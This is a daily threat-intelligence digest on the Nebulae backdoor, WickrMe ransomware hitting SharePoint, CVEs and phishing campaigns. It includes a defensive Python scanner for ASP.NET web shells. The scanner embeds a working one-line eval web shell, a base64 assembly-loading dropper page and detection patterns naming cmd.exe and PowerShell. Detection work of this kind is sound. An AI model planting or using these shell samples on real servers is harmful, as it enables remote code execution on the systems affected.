
Cyware Daily Threat Intelligence, April 28, 2021

Backdoors are hard to spot, but not for those who are using them. A new backdoor dubbed Nebulae has come to light after roughly two years of use by the Chinese threat actor group Naikon in a sophisticated cyberespionage campaign. Its capabilities range from collecting system information to downloading and manipulating files.

Hardly a day passes without a ransomware attack making the news, and the threat landscape now has another one, called WickrMe. The malware has been found targeting vulnerable SharePoint servers: the attackers exploit the server to drop a web shell, which in turn installs a Cobalt Strike Beacon backdoor.

Phishing scams targeting Office 365 users and JP Morgan Chase users also made the headlines in the past 24 hours.

Top Breaches Reported in the Last 24 Hours

Merseyrail hit
The U.K. rail network Merseyrail was recently subjected to a Lockbit ransomware attack. The attackers announced it themselves, using the compromised email account of a Merseyrail director (Heath) to send a message with the subject line 'Lockbit Ransomware Attack and Data Theft', so that the email appeared to come from the Director.

Ghostwriter operation
A widespread disinformation campaign dubbed Ghostwriter has been tied to a cyberespionage group that leveraged compromised Twitter, Facebook, and Instagram accounts. Between October 2020 and January 2021, researchers identified five new Ghostwriter operations conducted in both Polish and English.

Top Malware Reported in the Last 24 Hours

New WickrMe ransomware
A new ransomware dubbed WickrMe (also tracked as Hello, and named for the Wickr messaging accounts its operators use to negotiate ransom payments) has been found targeting SharePoint servers. The vulnerability exploited in the attack, CVE-2019-0604 (a SharePoint remote code execution flaw), allows attackers to take control of the SharePoint server and drop a web shell, which is later used to install a Cobalt Strike Beacon backdoor.
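The chain above (server exploit, then web shell, then Cobalt Strike) means the web shell is the earliest artefact a defender can find on disk. The following is an added example, not code from the original briefing or from any vendor report: a heuristic scanner for ASP.NET handler files that scores each page against indicator patterns typical of dropped web shells (script evaluation of request input, in-memory assembly loading, process launching). The indicator list, the weights, the threshold, and the three sample pages are all this example's own constructions.

```python
"""Heuristic scan of ASP.NET pages (.aspx/.ashx/.asmx) for web-shell indicators.

Added example for this briefing; not code from the original post or from any
cited vendor report. Indicator patterns and weights are assumptions about what
a dropped SharePoint web shell commonly looks like; tune before production use.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

# (name, regex, weight). High-weight patterns are rare in legitimate pages.
INDICATORS = [
    ("eval_of_request",    re.compile(r"eval\s*\(\s*Request\b", re.I), 10),
    ("assembly_load",      re.compile(r"Assembly\.Load\s*\(", re.I), 6),
    ("process_start",      re.compile(r"ProcessStartInfo\s*\(|Process\.Start\s*\(", re.I), 6),
    ("cmd_or_powershell",  re.compile(r"\b(cmd\.exe|powershell(\.exe)?)\b", re.I), 4),
    ("jscript_page",       re.compile(r'Language\s*=\s*["\']?JScript', re.I), 3),
    ("base64_decode",      re.compile(r"Convert\.FromBase64String\s*\(", re.I), 2),
    ("request_item_index", re.compile(r"Request\.(Item|Form|QueryString|Headers)\[", re.I), 2),
]
THRESHOLD = 8  # assumed cut-off: a single eval(Request...) is enough on its own


@dataclass
class Finding:
    path: str
    score: int
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_aspx(text: str, path: str = "<inline>") -> Finding:
    """Score one page's source text against INDICATORS."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return Finding(path, score, hits)


def scan_dir(root: str, exts=(".aspx", ".ashx", ".asmx"), since: float = None) -> list:
    """Walk `root` and return suspicious handler files.

    `since` (epoch seconds) restricts the scan to files modified after that
    time, which is the natural filter when hunting for a recently dropped shell.
    """
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            p = os.path.join(dirpath, fn)
            if since is not None and os.path.getmtime(p) < since:
                continue
            with open(p, encoding="utf-8", errors="replace") as fh:
                f = score_aspx(fh.read(), p)
            if f.suspicious:
                findings.append(f)
    return findings


# Constructed samples for the demo; not real artefacts from the campaign.
BENIGN_PAGE = (
    '<%@ Page Language="C#" Inherits="Microsoft.SharePoint.ApplicationPages.LayoutsPageBase" %>\n'
    '<html><body><asp:Label runat="server" Text="Welcome" /></body></html>'
)
ONE_LINER_SHELL = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
DROPPER_PAGE = (
    '<%@ Page Language="C#" %>\n'
    '<% var b = Convert.FromBase64String(Request.Form["d"]);\n'
    '   System.Reflection.Assembly.Load(b).GetType("L").GetMethod("R").Invoke(null, null); %>'
)


def demo() -> int:
    """Write the three samples into a temp directory, scan it, return the hit count."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("settings.aspx", BENIGN_PAGE),
                           ("error.aspx", ONE_LINER_SHELL),
                           ("upload.ashx", DROPPER_PAGE)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        findings = scan_dir(root)
        for f in findings:
            print(f"{f.path}: score={f.score} hits={','.join(f.hits)}")
        return len(findings)


if __name__ == "__main__":
    demo()
```

In a real hunt, point `scan_dir` at the SharePoint LAYOUTS directory and pass `since` set to the date of the suspected exploitation window; anything flagged should be triaged together with IIS request logs for the same file name, since a web shell only matters once something talks to it.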

New Nebulae backdoor
A cyberespionage campaign spanning roughly two years deployed a new backdoor called Nebulae. The campaign was run by the Chinese threat actor group Naikon and targeted military organizations in Southeast Asia. Nebulae's capabilities include collecting system information, manipulating files and folders, downloading files, and terminating processes on compromised devices.

Top Vulnerabilities Reported in the Last 24 Hours

Linux kernel vulnerability
An information disclosure vulnerability in the Linux kernel could leak kernel memory contents to an unprivileged local user and serve as a stepping stone for further compromise. The flaw, tracked as CVE-2020-28588, was found in the /proc/<pid>/syscall functionality on 32-bit ARM devices running the OS. Linux kernel versions 5.10-rc4, 5.4.66, and 5.9.8 were confirmed to be affected, and a patch fixing the issue was released on December 3, 2020.

Flaw patched in Chrome
An update released for Chrome 90 patches yet another serious vulnerability in the V8 JavaScript engine used by the browser. Tracked as CVE-2021-21227, the flaw can be exploited for remote code execution in the targeted user's browser. It is reportedly related to CVE-2020-16040 and CVE-2020-15965.

Eaton patches flaws
Power management solution provider Eaton has released patches for its Intelligent Power Manager (IPM) software to address several serious vulnerabilities that could allow attackers to disrupt power supply. The flaws can be exploited for SQL injection, command execution, arbitrary file deletion, and arbitrary file upload.

Top Scams Reported in the Last 24 Hours

A new phishing campaign
Researchers have uncovered a new phishing campaign that targets Office 365 users. The emails carry a convincing SharePoint-themed document that claims to urgently require the recipient's signature. Once recipients click on the document, they are redirected to a phishing page that harvests their credentials.

JP Morgan impersonated
Two new phishing scams targeting customers of JPMorgan Chase Bank have been identified. Both combine social engineering with brand impersonation in an attempt to steal customers' login credentials. The first scam impersonates the bank itself, while the second impersonates the Chase Fraud Department.


Tags: nebulae backdoor, naikon apt, hellowickrme ransomware, cobalt strike beacon backdoor, sharepoint servers

Posted on: April 28, 2021